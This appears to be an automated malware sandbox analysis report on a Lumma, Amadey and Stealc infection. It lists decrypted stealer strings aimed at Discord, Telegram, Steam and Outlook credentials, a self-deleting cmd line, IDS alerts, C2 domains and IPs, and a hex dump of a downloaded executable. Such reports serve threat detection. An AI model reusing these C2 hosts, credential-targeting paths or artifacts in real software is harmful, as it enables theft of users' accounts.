Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Temp\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: .exe
Source: 39.0.num.exe.e60000.0.unpack String decryptor: runas
Source: 39.0.num.exe.e60000.0.unpack String decryptor: open
Source: 39.0.num.exe.e60000.0.unpack String decryptor: /c start
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %DESKTOP%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %APPDATA%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %USERPROFILE%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %DOCUMENTS%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %PROGRAMFILES%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: %RECENT%
Source: 39.0.num.exe.e60000.0.unpack String decryptor: *.lnk
Source: 39.0.num.exe.e60000.0.unpack String decryptor: files
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \discord\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Local Storage\leveldb
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Telegram Desktop\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: key_datas
Source: 39.0.num.exe.e60000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 39.0.num.exe.e60000.0.unpack String decryptor: map*
Source: 39.0.num.exe.e60000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 39.0.num.exe.e60000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 39.0.num.exe.e60000.0.unpack String decryptor: F8806DD0C461824F*
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Telegram
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Tox
Source: 39.0.num.exe.e60000.0.unpack String decryptor: *.tox
Source: 39.0.num.exe.e60000.0.unpack String decryptor: *.ini
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Password
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 00000001
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 00000002
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 00000003
Source: 39.0.num.exe.e60000.0.unpack String decryptor: 00000004
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Pidgin
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \.purple\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: accounts.xml
Source: 39.0.num.exe.e60000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 39.0.num.exe.e60000.0.unpack String decryptor: token:
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Software\Valve\Steam
Source: 39.0.num.exe.e60000.0.unpack String decryptor: SteamPath
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \config\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ssfn*
Source: 39.0.num.exe.e60000.0.unpack String decryptor: config.vdf
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DialogConfig.vdf
Source: 39.0.num.exe.e60000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 39.0.num.exe.e60000.0.unpack String decryptor: libraryfolders.vdf
Source: 39.0.num.exe.e60000.0.unpack String decryptor: loginusers.vdf
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Steam\
Source: 39.0.num.exe.e60000.0.unpack String decryptor: sqlite3.dll
Source: 39.0.num.exe.e60000.0.unpack String decryptor: browsers
Source: 39.0.num.exe.e60000.0.unpack String decryptor: done
Source: 39.0.num.exe.e60000.0.unpack String decryptor: soft
Source: 39.0.num.exe.e60000.0.unpack String decryptor: \Discord\tokens.txt
Source: 39.0.num.exe.e60000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 39.0.num.exe.e60000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 39.0.num.exe.e60000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 39.0.num.exe.e60000.0.unpack String decryptor: https
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 39.0.num.exe.e60000.0.unpack String decryptor: POST
Source: 39.0.num.exe.e60000.0.unpack String decryptor: HTTP/1.1
Source: 39.0.num.exe.e60000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 39.0.num.exe.e60000.0.unpack String decryptor: hwid
Source: 39.0.num.exe.e60000.0.unpack String decryptor: build
Source: 39.0.num.exe.e60000.0.unpack String decryptor: token
Source: 39.0.num.exe.e60000.0.unpack String decryptor: file_name
Source: 39.0.num.exe.e60000.0.unpack String decryptor: file
Source: 39.0.num.exe.e60000.0.unpack String decryptor: message
Source: 39.0.num.exe.e60000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 39.0.num.exe.e60000.0.unpack String decryptor: screenshot.jpg
Source: 42.0.test.exe.e90000.0.unpack String decryptor: servicedny.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: authorisev.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: faulteyotk.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: dilemmadu.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: contemteny.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: goalyfeastz.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: opposezmny.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: seallysl.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: goalyfeastz.site
Source: 42.0.test.exe.e90000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 42.0.test.exe.e90000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 42.0.test.exe.e90000.0.unpack String decryptor: - Screen Resoluton:
Source: 42.0.test.exe.e90000.0.unpack String decryptor: - Physical Installed Memory:
Source: 42.0.test.exe.e90000.0.unpack String decryptor: Workgroup: -
Source: 42.0.test.exe.e90000.0.unpack String decryptor: 2Zo0RN--PRIVATE
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58197 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58203 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58206 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58208 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:58231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:58238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58239 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:58243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:58246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:58254 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 76bf5a4dba.exe, 00000014.00000003.2307921520.0000000004D7B000.00000004.00001000.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2348423588.000000000034C000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: my_library.pdb source: 76bf5a4dba.exe, 00000014.00000003.2307921520.0000000004D7B000.00000004.00001000.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2348423588.000000000034C000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, 0000000A.00000003.1531142998.0000000004990000.00000004.00001000.00020000.00000000.sdmp, M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe, 0000000A.00000002.1667557254.00000000000C2000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: number of queries: 1752
Source: firefox.exe Memory has grown: Private usage: 1MB later: 184MB

Networking

barindex
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.7:55563 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.7:55134 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49701 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49702 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49721 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.7:50738 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.7:52927 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.7:61796 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49749 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:49732 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:58188 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.7:57934 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.7:54819 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:58189
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.7:50788 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58192 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:58191 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58194 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58195 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58196 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58197 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58202 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:58201 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58199 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:58198 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.7:57935 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.7:61818 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.7:58030 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:58205 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58203 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58206 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.7:62527 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58208 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58215 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:58218 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:58216 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58223 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:58232 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 31.41.244.11:80 -> 192.168.2.7:58221
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58217 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.7:52718 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.7:50281 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.7:58170 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.7:49291 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.7:62313 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58247 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58250 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58253 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58239 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58249 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58251 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58252 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58248 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.7:58254 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49721 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49749 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:58194 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58194 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:58192 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58192 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58203 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:58195 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:58208 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:58247 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58208 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58247 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58254 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:58252 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:58248 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58248 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:58253 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:58206 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:58206 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: dilemmadu.site
Source: Malware configuration extractor URLs: servicedny.site
Source: Malware configuration extractor URLs: contemteny.site
Source: Malware configuration extractor URLs: seallysl.site
Source: Malware configuration extractor URLs: goalyfeastz.site
Source: Malware configuration extractor URLs: opposezmny.site
Source: Malware configuration extractor URLs: faulteyotk.site
Source: Malware configuration extractor URLs: authorisev.site
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:45:26 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Wed, 30 Oct 2024 10:42:46 GMTConnection: keep-aliveETag: "67220da6-2c3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 fa d5 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 62 6e 66 78 72 73 75 00 e0 2b 00 00 a0 00 00 00 ce 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6a 63 65 74 79 69 6d 00 20 00 00 00 80 2c 00 00 06 00 00 00 08 2c 00 00 00 00 00 00 00 00 